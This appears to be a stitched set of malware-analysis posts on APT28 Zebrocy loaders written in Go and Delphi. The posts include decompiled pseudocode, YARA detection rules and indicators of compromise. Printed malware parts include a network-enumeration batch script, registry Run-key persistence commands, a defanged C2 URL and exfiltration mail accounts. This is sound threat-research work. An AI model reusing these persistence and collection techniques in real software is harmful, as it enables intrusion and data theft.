  main_asduiwom6633(byte_6409B5, 20, v6, v7);   // 'PrgStart: '
  runtime_concatstring2(&v18, v6, v7, v21, v15, v9, v10);
  v21 = v9;
  v15 = v10;
  main_asduiwom663721(v4, v5);
  v20 = v4;
  v14 = v5;
  time_Now((char)v4);
  sub_44CE6E();
  sub_44CE6E();
  time_Time_Format(
    (char)v4,
    v5,
    v6,
    v7,
    v8,
    "[2006-01-02-15.04.05]block device requiredbufio: negative countcheckdead: runnable gcommand not supportedconcurrent map writesdecompression failuredefer on system stackexec: already startedfindrunnable: wrong pgcprocs inconsistencyhttp: Handler timeouthttp: nil Request.URLimage: unknown formatinvalid ALPN protocolinvalid named capturekey is not comparablelink has been severednot enough pixel datapackage not installedpanic on system stackpng: invalid format: read-only file systemreflect.Value.Complexreflect.Value.Pointerreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown empty Contextuser defined signal 1user defined signal 2wglCreateLayerContextwglDescribeLayerPlane from SOCKS5 proxy at %SystemRoot%\\system32\\%v.WithValue(%#v, %#v)/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateCompatibleBitmapCreateIoCompletionPortDEBUG_HTTP2_GOROUTINESDateline Standard TimeEKU not permitted: %#vGeorgian Standard TimeGetEnvironmentStringsWGetTimeZoneInformationHawaiian Standard TimeInscriptional_ParthianMAX_CONCURRENT_STREAMSMountain Standard TimeNtWaitForSingleObject",
    21,
    v11,
    v12);

III. Yara Signature

rule apt28_win_zebrocy_golang_loader_modified {
   meta:
      description = "Detects unpacked modified APT28/Sofacy Zebrocy Golang."
      author = "@VK_Intel"
      date = "2018-12-23; updated: 2018-12-25" 
   strings:
   // Go build
    $go = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 }
    $init = { 6d 61 69 6e 2e 69 6e 69 74 }
    $main = "main" ascii wide fullword
    $scr_git = {67 69 74 68 75 62 2e 63 6f 6d 2f 6b 62 69 6e 61}
    $s0 = "os/exec.(*Cmd).Run" fullword ascii
    $s1 = "net/http.(*http2clientConnReadLoop).processHeaders" fullword ascii
    $s2 = "os.MkdirAll" fullword ascii
    $s3 = "os.Getenv" fullword ascii
    $s4 = "os.Create" fullword ascii
    $s5 = "io/ioutil.WriteFile" fullword ascii
   condition:
    uint16(0) == 0x5a4d and $go and $init and all of ($s*) and #main > 10 and #scr_git > 5
}

Let’s Learn: In-Depth on APT28/Sofacy Zebrocy Golang Loader

Goal: Reverse engineer the latest APT28/Sofacy Zebrocy loader, coded in the Go programming language, oftentimes referred to Golang.

https://platform.twitter.com/widgets.js
Source:
UPX-packed APT28/Sofacy Zebrocy Loader (MD5: 602d2901d55c2720f955503456ac2f68)
Outline:

I. Background & Summary
II. Zebrocy main* Functions
A. main_init
B. main_main
C. main_Parse
III. Yara Signature

Analysis:
I. Background & Summary
Palo Alto Unit 42 recently discovered and reported one of the latest Sofacy/APT28 group’s Zebrocy samples, compiled in the Golang programming language. This group is also known as Fancy Bear, STRONTIUM, Pawn Storm, and¬†Sednit.¬†
I recommend reading research by Robert Falcone and Unit 42 titled “Sofacy Creates New ‚ÄėGo‚Äô Variant of Zebrocy Tool.”¬†This new twist of leveraging Golang for malware compilation complicates binary analysis and comparison across other samples as the group deploys quite a bit with programming languages such as Delphi and C#.
By and large, analysis reveals that this¬† Zebrocy version is unsophisticated and heavily relies on various Golang open source code templates from GitHub including¬†iamacarpet/go_win64api (ProcessList, InstalledSoftwareList, ListLoggedInUsers,SessionDetails/FullUser), shirou_gopsutil (host_Info), and¬†kbinani/screenshot (NumActiveDisplays, GetDisplayBounds, CaptureRect). The malware capabilities include installation in HKCU registry as “Media Center Extender Service” and locally in %LOCALAPPDATA%, execution via “cmd”, profiling a victim system, obtaining desktop screenshots, and sending the data to the server. The original Golang Zebrocy project contains the following debugging path “C:/!Project/C1/ProjectC1Dec/main.go” with the “ProjectC1Dec” name.
Thanks to the released Golang IDA code script helpers, developed by George Zaytsev, this malware introduced an interesting angle allowing to dive deeper into reversing of this Zebrocy Golang loader. 
II. Zebrocy main* Functions
Essentially, Zebrocy Golang loader is, by and large, a slightly modified copy/paste code from GitHub related to various open source Golang libraries. For example, the open source Golang code to retrieve a list of loggedInUsers is as follows: 

package main

import (
"fmt"
wapi "github.com/iamacarpet/go-win64api"
)

func main(){
// This check runs best as NT AUTHORITY\SYSTEM
//
// Running as a normal or even elevated user,
// we can't properly detect who is an admin or not.
//
// This is because we require TOKEN_DUPLICATE permission,
// which we don't seem to have otherwise (Win10).
users, err := wapi.ListLoggedInUsers()
if err != nil {
fmt.Printf("Error fetching user session list.\r\n")
return
}

fmt.Printf("Users currently logged in (Admin check doesn't work for AD Accounts):\r\n")
for _, u := range users {
fmt.Printf("\t%-50s - Local User: %-5t - Local Admin: %t\r\n", \
u.FullUser(), u.LocalUser, u.LocalAdmin)
}
}

This same code is copied and embedded as part of the malware main_Session_List routine as observed in pseudo-code.

The Golang version of the malware consists of the following 16 main_* named functions and their detailed descriptions:

Golang Function Name Description
main_GetDisk get disk via “cmd”
main_Getfilename obtain path to “%LOCALAPPDATA%\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}\wcncsvc.exe”
main_CMDRunAndExit execute a file and exit via “cmd”
main_Tasklist retrieve process list via iamacarpet/go_win64api/ProcessList method
main_Installed retrieve installed software via iamacarpet_go_win64api_InstalledSoftwareList method
main_Session_List retrieve active session list (logged in users + Run-As users) via iamacarpet/go_win64api/ListLoggedInUsers method
main_List_Local_Users retrieve a formatted list of local users via theListLocalUsers method
main_systeminformation retrieve host information via shirou/gopsutil/host_Info method
main_CreateSysinfo concatenate and format all the victim data from main_Tasklist, main_GetDisk, time_time_Now, main_Installed, main_Session_List, main_List_Local_Users, and time_Time_Format.
main_ParseData call main_Getfilename and create a copy of itself in %LOCALAPPDATA% and creates a registry key via cmd “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Media Center Extender Service,/d”
main_SendPOSTRequests send a server POST request, call time_Sleep(4230196224, 6) and if after 19 attempts, exits via os.exit, otherwise call main_main, then main_ParseData, and main_ParseData, main_CMDRunAndExit.
main_Screen take a screenshot of the desktop
main_GetSND get stdin from “cmd”
main_PrcName get path to itself process
main_main run the main function of the Golang Zebrocy
main_init initialize main structures necessary for Golang malware execution

A. main_init
The malware starts with initializes various libraries necessary for Golang execution (net, encoding, regular expressions, and necessary reliant GitHub project libraries). The C++ pseudo-coded Golang malware routine is as follows:

//////////////////////////////////////////
////// APT28 Golang Zebrocy main_init ////
//////////////////////////////////////////

int main_init()
{

if ( (unsigned int)&_0 <= *(_DWORD *)(*(_DWORD *)__readfsdword(20) + 8) )
runtime_morestack_noctxt();
result = (unsigned __int8)byte_8625A6;
if ( (unsigned __int8)byte_8625A6 <= 1u )
{
if ( byte_8625A6 == 1 )
runtime_throwinit();
byte_8625A6 = 1;
bytes_init();
encoding_hex_init(); // hex_encode init
fmt_init(); // fmt init
image_jpeg_init(); // image jpeg init
io_ioutil_init(); // io util
net_http_init(); // http util
net_url_init(); // net url
os_init(); // os init
os_exec_init(); // os exec init
path_filepath_init(); // file path init
regexp_init(); // regular expressions oinit
strings_init(); // string init
syscall_init(); // syscall init
time_init(); // timer init
github_com_iamacarpet_go_win64api_init(); // golang enumerate lib
github_com_kbinani_screenshot_init(); // golang screenshot lib
result = github_com_shirou_gopsutil_host_init(); // go host enum lib
byte_8625A6 = 2;
}
return result;
}

B. main_main
The main_main function calls initialize other important main calls
retrieving the path to the process of itself, obtaining cmd stdin output, retrieving system information, making a screenshot, and sending POST requests to the main command-and-control server.
The pseudo-coded C++ code is as follows:

//////////////////////////////////////////
////// APT28 Golang Zebrocy main_main ////
//////////////////////////////////////////
int main_main()
{

...

if ( (unsigned int)&retaddr <= *(_DWORD *)(*(_DWORD *)__readfsdword(20) + 8) )
runtime_morestack_noctxt();
main_PrcName(); // get path to itself
strings_Contains(v1, v3, &byte_66EE33, 6); // "comsvccookie"
if ( v5 )
{
// get Cmd_Stdin pipe
main_GetSND(v10, v12);
v1 = v0;
v3 = v2;
// retrieve system info
main_CreateSysinfo();
v4 = v0;
v5 = v2;
// retrieve screenshot
main_Screen(v2, v0);
// "hxxp://89[.]37[.]226[.]123/advance/portable_version/service[.]php"
result = main_SendPOSTRequests((int)domain, 57, v2, v4, v2, v4, v2, v4);
}
else
{
result = main_SendPOSTRequests(
(int)&word_673186, // http://google.comif-modified-since
17,
(int)"01456:;?@BCLMNOPSZ[\"\\\n\r\t",
1,
(int)"1456:;?@BCLMNOPSZ[\"\\\n\r\t",
1,
(int)"1456:;?@BCLMNOPSZ[\"\\\n\r\t",
1);
}
return result;
}

C. main_Parse
The main_Parse function serves as the main persistency script writing the binary to %LOCALAPPDATA% and adding itself to¬†HKCU\Software\Microsoft\Windows\CurrentVersion\Run as “Media Center Extender Service.”

//////////////////////////////////////////
////// APT28 Golang Zebrocy main_ParseData ////
//////////////////////////////////////////
int __cdecl main_ParseData(int a1, int a2)
{

// Get %LOCALAPPDA% new file path
//"%LOCALAPPDATA%\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}\wcncsvc.exe"
main_Getfilename();
v24 = v2;
v25 = v3;
os_Create(v3, v2);
if ( runtime_deferproc(12, off_68613C) )
{
result = runtime_deferreturn(v11);
}
else
{
// Write itself to the specified path
io_ioutil_WriteFile(v25, v24, v14, v17, v18, 420, v21);
((void (*)(void))loc_44CDC8)();
v30 = v25;
v31 = v24;
os_exec_Command((int)&cmd, 3, (int)&v29, 2, 2);
runtime_newobject(obj_byte);
*v12 = 1;
v4 = v19;
v5 = *(_BYTE *)v19;
if ( dword_862D30 )
runtime_gcWriteBarrier(v19);
else
*(_DWORD *)(v19 + 76) = v12;
os_exec__ptr_Cmd_Run(v4, v12, v15);
((void (*)(void))loc_44CDC8)();
// "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run
// /v Media Center Extender Service /d"
runtime_concatstring3(0, (unsigned int)dword_682308, 96, v25, v24, &word_66E71E, 4, v22);
v27 = v6;
v28 = v23;
os_exec_Command((int)&cmd, 3, (int)&v26, 2, 2);
runtime_newobject(obj_byte);
*v13 = 1;
v7 = v20;
v8 = *(_BYTE *)v20;
if ( dword_862D30 )
runtime_gcWriteBarrier(v20);
...
}

III. Yara Signature

rule apt28_win_zebrocy_golang_loader {
meta:
description = "Detects unpacked APT28/Sofacy Zebrocy Golang."
author = "@VK_Intel"
date = "2018-12-21"
hash = "15a866c3c18046022a810aa97eaf2e20f942b8293b9cb6b4d5fb7746242c25b7"
strings:

// main_init
$x0 = {6d 61 69 6e 2e 69 6e 69 74}

// main_main
$x1 = {6D 61 69 6e 2e 6d 61 69 6e}

// main_Parse
$x2 = {6d 61 69 6e 2e 50 61 72 73 65 44 61 74 61}

// main.GetSND
$x3 = {6d 61 69 6e 2e 47 65 74 53 4e 44}

// main.PrcName
$x4 = {6d 61 69 6e 2e 50 72 63 4e 61 6d 65}

condition:
( uint16(0) == 0x5a4d and
( 4 of ($x*) )
)
}

Let’s Learn: Dissecting APT28 Zebrocy Delphi Loader/Backdoor Variants: Version 6.02 -> Version 7.00

Goal: Analyze and document the progression of APT28 Zebrocy Delphi loader/backdoor variants from 6.02 to 7.00.

https://platform.twitter.com/widgets.js
Source:

MD5: Zebrocy Delphi Variant First Seen
84352ccad3cfa152d98cf76b08623b92 2018-12-11 13:14:34
fe0da70a592d25ddbfbd47b22f88542f 2018-12-13 11:49:12
4384c701308a9d3aa92f49615ec74b2d 2018-06-26 14:08:28
26b213343bac2b4c69a261a2f5c00e89 2018-12-13 11:49:32
47a026d93ae8e0cc292e8d7a71ddc89e 2018-12-13 11:49:31

Outline:

I. Background & Summary
II. Zebrocy Delphi Malware: Version 6.02
III. Zebrocy Delphi Malware: Version 7.00
IV. Zebrocy TForm1 Configurations
IV. Yara Signature

I. Background & Summary
APT28, also known as Sofacy, Fancy Bear, STRONTIUM, Pawn Storm, Sednit, continues to be very active lately targeting various government and political entities throughout 2018. Before diving deeper into the latest Zebrocy samples, I highly recommend reading ESET blog titled¬†“Sednit: What‚Äôs going on with Zebrocy?” and Palo Alto Unit 42 one titled “Dear Joohn: The Sofacy Group‚Äôs Global Campaign.”
The Zebrocy Delphi variants serve as loaders and backdoors collecting victim information. They are occasionally UPX packed, store their configurations data in the resource section “RCData” as “TForm1” class. As a general rule, forms in Delphi¬†are defined by the¬†TForm¬†class. The analyzed samples revealed malware version progression from 6.02 to 7.0 with the modified Timer objects and registry key and software information collection methods to scanning hosts for documents, archives, images, database, and configurations files.
Additionally, one of the oddities includes the hexadecimal art representation in Icon.Data object of TForm1.

The Python code obtains the resource as follows:

'''
Extract APT28 Zebrocy TForm1 Delphi Code from binary resource section
@VK_Intel
'''
import pefile
pe = pefile.PE("<PATH_TO_ZEBROCY")

# store our tform1_struct
tform1_struct = ""
offset = 0x0
size = 0x0

for rsrc in pe.DIRECTORY_ENTRY_RESOURCE.entries:
for entry in rsrc.directory.entries:
if entry.name is not None:
print(entry.name)
# search for TFORM1 resource
if entry.name.__str__() == "TFORM1":
offset = entry.directory.entries[0].data.struct.OffsetToData
size = entry.directory.entries[0].data.struct.Size


tform1_struct = pe.get_memory_mapped_image()[offset:offset+size]
print(tform1_struct)

The code output response is as follows:

DVCLAL
L30
LIBEAY32
PACKAGEINFO
PLATFORMTARGETS
SSLEAY32
TFORM1
MAINICON
b'TPF0\x06TForm1\x05Form1\x04Left\x02\x00\x03Top\x02\x00\x0cClientHeight\x03\x7f\x01\x0bClientWidth\x03\xc9\x01\x05Color\x07\tclBtnFace\x0cFont.Charset\x07\x0fDEFAULT_CHARSET...

Notably, the configuration contains all imported necessary SSL libraries LIBEAY32 and SSLEAY32, DVCLAL and L30 config, package info (contains Windows API utility code), and, most importantly, TForm1 Delphi main code.
The TForm1 resource is the main processor for the Window setting and creating objects TLabel, TEdit, and TMemo, which are descriptive of the malware functionality.
II. Zebrocy Delphi Malware: Version 6.0.2

For example, here is the code setting the Window and creating main victim collection and keylogger functionality and possible network domain parser module, taken from Zebrocy version 6.02
(0a6c1db916ac8ddf0ef67196279e12d163e07969d9cc68c0aed6b63d11f76d6c):

///////////////////////////////////////////////////
////// APT28 Zebrocy Malware TForm1 Class /////////
///////////////////////////////////////////////////
object Form1: TForm1
Left = 0
Top = 0
ClientHeight = 358
ClientWidth = 509
Color = clBtnFace
Font.Charset = DEFAULT_CHARSET
Font.Color = clWindowText
Font.Height = -11
Font.Name = 'Tahoma'
Font.Style = []
OldCreateOrder = False
PixelsPerInch = 96
TextHeight = 13
object c: TLabel
Left = 428
Top = 232
Width = 38
Height = 13
Caption = 'KEYLOG' // keylogger object
end
object Label2: TLabel
Left = 417
Top = 197
Width = 49
Height = 13
Caption = 'SYS_INFO' // machine system info object
end
object Memo3: TMemo
Left = 0
Top = 179
Width = 445
Height = 179 // network domain collector and parser object
Lines.Strings = (
'@ECHO OFF'
'FOR /F "tokens=1 delims=\ " %%n IN ('#39'net view^|FIND "\\"'#39') DO ('

' FOR /F "tokens=2 delims=[]" %%i IN ('#39'ping -a -n 1 -w 0 %%n^|FI' +
'ND "["'#39') DO ('
' ECHO %%i %%n>>1.txt'

' FOR /F "tokens=1,2,3,4 delims= " %%a IN ('#39'net view \\%%n^|FI' +
'ND " "'#39') DO ('
' IF "%%b"=="Disk" ('
' ECHO %%b: \\%%n\%%a>>1.txt'
' ) ELSE ('

' IF "%%b"=="Print" ECHO %%b: \\%%n\%%a>>1.t' +
'xt'
' )'
' )'
' )'
')')
TabOrder = 17
Visible = False
end

The malware drops a batch script to collect network domain information and saving it locally for exfiltration.

The observed TTimer timer objects (Enabled, OnTimer, Interval Parameters) code is as follows:

///////////////////////////////////////////////////
/// APT28 Zebrocy Malware Delphi Timer Class //////
///////////////////////////////////////////////////
object Timer_post: TTimer
Enabled = False
OnTimer = Timer_postTimer
Left = 144
end
object Timer_hello: TTimer
Enabled = False
Interval = 900000 // 900 seconds or 15 minutes interval
OnTimer = Timer_helloTimer
Left = 208
end
object Timer_scan: TTimer
Enabled = False
OnTimer = Timer_scanTimer
Left = 272
end
object Timer_all: TTimer
Enabled = False
Interval = 6000 // 6 seconds interval
OnTimer = Timer_allTimer
Left = 328
end

The all observed unique timer objects are as follows:

Timer_FirstTimer -> Interval 5000 miliseconds
Timer_handlTimer -> Interval 5000 miliseconds
Timer_SCRTimer -> Interval 60000 miliseconds
Timer_keyTimer -> Interval 120000 miliseconds
Timer_dsetTimer -> Interval 10000 miliseconds
Timer_mainTimer -> Interval 60000 miliseconds
Timer_allTimer -> Interval 6000 miliseconds
Timer_helloTimer -> Interval 900000 miliseconds
Timer_postTimer
Timer_scanTimer
Timer_lodsbTimer
Timer_downlTimer
Timer_regTimer
Timer_uplTimer
Timer_LogsTimer
Timer_DelTimer
Timer_SCRLDTimer

The POP3/SMTP mechanism is as follows:

///////////////////////////////////////////////////
/// APT28 Zebrocy Delphi SMTP/POP3/SSL Class //////
///////////////////////////////////////////////////
object IdPOP31: TIdPOP3
AutoLogin = True
SASLMechanisms =
Left = 272
Top = 112
end
object IdSMTP1: TIdSMTP
SASLMechanisms =
Left = 328
Top = 112
end
object IdSSLIOHandlerSocketOpenSSL1: TIdSSLIOHandlerSocketOpenSSL
MaxLineAction = maException
Port = 0
DefaultPort = 0
SSLOptions.Mode = sslmUnassigned
SSLOptions.VerifyMode = []
SSLOptions.VerifyDepth = 0
Left = 272
Top = 168
end
end

III. Zebrocy Delphi Malware: Version 7.00
Zebrocy Version 7.0
(SHA-256: 215f7c08c2e3ef5835c7ebc9a329b04b8d5215773b7ebfc9fd755d93451ce1ae):

The latest malware version includes the TLab scan object scanning for Microsoft Word, Microsoft Excel, Microsoft PowerPoint, PDF, archives (.rar, .zip) and image files (.jpg, bmp, tiff). Additionally, it also parses for configuration and database files (e.g,, .dat, .json, .db).

///////////////////////////////////////////////////
/// APT28 Zebrocy Delphi Special File Searcher ////
///////////////////////////////////////////////////
object scan1: TLabel
Left = 8
Top = 8
Width = 154
Height = 13
// Scanner for documents
Caption = 'scan {all} *.docx, *.xlsx, *.pdf,' // Scan for MS Word, Excel, PDF
end
object scan2: TLabel
Left = 168
Top = 8
Width = 129
Height = 13
 // Scanner for documents, archives, & images

Caption = '*.pptx, *.rar, *.zip, *.jpg,' // Scan for Powerpoint, archive, JPG imageendobject scan3: TLabel Left = 8 Top = 27 Width = 68 Height = 13 // Scanner for images Caption = '*.bmp, *.tiff /' // Scan for BMP and TIFF imageend... object Label3: TLabel Left = 8 Top = 46 Width = 147 Height = 13 // Scanner for configurations and database files Caption = 'scan {all} *.dat, *.json, *.db /' // Scan for .DAT, .JSON, .db end...

Additionally, it adds the key in “HKCU\Environment\UserInitMprLogonScript” as itself for persistency.

///////////////////////////////////////////////////
/// APT28 Zebrocy Delphi HKCU Registry Persistr ///
///////////////////////////////////////////////////
object Button2: TButton
Left = 309
Top = 3
Width = 122
Height = 25
Caption = 'HKCU\Environment'
TabOrder = 6
end
object Button3: TButton
Left = 310
Top = 34
Width = 122
Height = 25
Caption = 'UserInitMprLogonScript'
Tab

The all observed unique Timer objects are as follows (TTimer Timer Objects (Enabled, OnTimer, Interval parameters):

Timer_FirstTimer -> Interval 5000 miliseconds
Timer_taskTimer -> Interval 90000 miliseconds
Timer_sendTimer -> Interval 120000 miliseconds
Timer_SCRTimer -> Interval 120000 miliseconds
Timer_OTimer -> Interval 28800000 miliseconds
Timer_postTimer
Timer_mainTimer

The observed mail companies used for command-and-cotrol communications and exfiltration:

Leveraged Mail Servers:
ambcomission[.]com
seznam[.]cz
post[.]cz
india[.]com
Email Accounts:
tomasso25@ambcomission[.]com
kevin30@ambcomission[.]com
salah444@ambcomission[.]com
rishit333@ambcomission[.]com
karakos3232@seznam[.]cz
antony.miloshevich128@seznam[.]cz
b.huacop11@india[.]com
trasler22@ambcomission[.]com
trash023@ambcomission[.]com

IV. Zebrocy TForm1 Configurations
A. Zebrocy v6.02 TForm1 Config
(SHA-256: 0a6c1db916ac8ddf0ef67196279e12d163e07969d9cc68c0aed6b63d11f76d6c):

KEYLOG
SYS_INFO
@ECHO OFF
FOR /F "tokens=1 delims=\ " %%n IN ('net view^|FIND "\\"')
DO (M FOR /F "tokens=2 delims=[]" %%i IN ('ping -a -n 1 -w 0 %%n^|FIND "["')
DO ( ECHO %%i %%n>>1.txt S FOR /F "tokens=1,2,3,4 delims= " %%a IN ('net view \\%%n^|FIND " "')
DO ( IF "%%b"=="Disk" (0 ECHO %%b: \\%%n\%%a>>1.txt )
ELSE (IF "%%b"=="Print"
ECHO %%b: \\%%n\%%a>>1.txt ) ) ))
ddr3
*\Software\Microsoft\Windows\CurrentVersion
C:\Users\Public\dset.ini
ProductId
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Run
libeay32.dll
ssleay32.dll
p.bin
v6.02
GET_NETWORK

B. Zebrocy v7.00 TForm1 Config
(SHA-256: 215f7c08c2e3ef5835c7ebc9a329b04b8d5215773b7ebfc9fd755d93451ce1ae):

KEYLOG
SYS_INFO
!scan {all} *.docx, *.xlsx, *.pdf, *.pptx, *.rar, *.zip, *.jpg, *.bmp, *.tiff /
adr_for_scan
C:\Users\Public\officeexcp.bin
KLA
C:\Users\Public\kla.bin
scan {all} *.dat, *.json, *.db /
eg add
EG_EXPAND
eg delete
GET_NETWORK
HKCU\Environment\UserInitMprLogonScript
v7.00
libeay32.dll
ssleay32.dll

C. Zebrocy v7.00 TForm1 Config 
(SHA-256: ae6326a8b0297dc6eff583f2305abaeab0347a3aef95fc51c5d76708cf32b73f)

SYS_INFO
eg add
EG_EXPAND
eg delete
C:\Users\Public\dset.ini
p.bin
v7.00
ssleay32.dll
libeay32.dll
C:\Users\Public\boot.ini
UserInitMprLogonScript
HKCU\Environment

One of the oddities related to the Zebrocy malware (SHA-256: ae6326a8b0297dc6eff583f2305abaeab0347a3aef95fc51c5d76708cf32b73f) includes Icon.Data {} object with the hexadecimal art.

V. Yara Signature 

rule apt28_win32_zebrocy_loader {
meta:
author = "@VK_Intel"
reference = "Detects Zebrocy Component"
date = "2018-12-14"
strings:
$s1 = "Timer_postTimer" fullword wide ascii
$s2 = "Timer_mainTimer" fullword ascii wide
$s3 = "Timer_FirstTimer" fullword ascii wide
$s4 = "UserInitMprLogonScript" fullword ascii wide
$s5 = "KEYLOG" fullword ascii wide
$s6 = "SYS_INFO" fullword ascii wide
$s7 = "EG_EXPAND" fullword ascii wide
$s8 = "HKCU\\Environment" fullword ascii wide
$s9 = "C:\\Users\\Public\\" fullword ascii wide
$s10 = "scan {all}" fullword ascii wide
      $r0 = "L30" fullword ascii wide
$r1 = "LIBEAY32" fullword ascii wide
$r2 = "TFORM1" fullword ascii wide
$r3 = "SSLEAY32" fullword ascii wide
$r4 = "DVCLAL" fullword ascii wide
$r5 = "PACKAGEINFO" fullword ascii wide
   condition:
( uint16(0) == 0x5a4d and
( all of them )
or ( 3 of ($s*) and 2 of ($r*) ) or ( all of ($r*) and 2 of ($s*) ) )

}